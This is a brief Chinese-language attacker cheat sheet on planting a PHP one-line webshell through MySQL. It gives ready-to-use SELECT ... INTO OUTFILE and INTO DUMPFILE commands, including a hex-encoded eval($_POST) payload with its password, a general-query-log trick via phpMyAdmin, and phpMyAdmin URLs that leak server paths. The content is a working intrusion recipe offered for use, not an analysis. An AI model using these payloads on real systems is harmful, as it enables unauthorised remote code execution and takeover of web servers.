mysql 写入一句话
方法一:1、SHOW VARIABLES LIKE "secure_file_priv"; 查看文件导出功能是否开启
如果: secure_file_priv NULL 值为 null 说明禁止状态,无法导出为文件,需要修改MySQL配置文件:查看是否有 secure_file_priv = ,没有的话添加上
如果为一个目录,如:secure_file_priv = /home 那就只能导出到指定的目录,子目录也不行
如果为为空,如 secure_file_priv = ,说明可以导出到任意位置,注意等号一定要有
2、写入:
select '<?php eval($_POST[kill]);?>' into outfile 'E:/phpStudy/PHPTutorial/WWW/kill1.php';
导出的木马文件一定要在可执行的目录下,如果有phpinfo.php文件,可以确认一下;
方法二:如果可以进入PHPmyadmin,但是无法导出文件,这时,可以进入变量,
搜索 general logOFF --这个默认是off,关闭的,把它打开
general log file --设置日志文件及位置
然后执行查询 select "<?php eval($_POST['hacker']);?>"
就可以连接日志文件了
补充:还可以直接用dumpfile来得到shell
select 0x3c3f706870206576616c28245f504f53545b636d645d293f3e into DUMPFILE 'C:/XXX/php.php';
加密部分为 lanker 一句话 密码为 cmd
phpmyadmin的libraries目录多个文件存在绝对路径泄露漏洞- -http://target/phpmyadmin/libraries/string.lib.php
http://target/phpmyadmin/libraries/string.lib.php
http://target/phpmyadmin/libraries/database_interface.lib.php
http://target/phpmyadmin/libraries/db_table_exists.lib.php
http://target/phpmyadmin/libraries/display_export.lib.php
http://target/phpmyadmin/libraries/header_meta_style.inc.php http://target/phpmyadmin/libraries/mcrypt.lib.php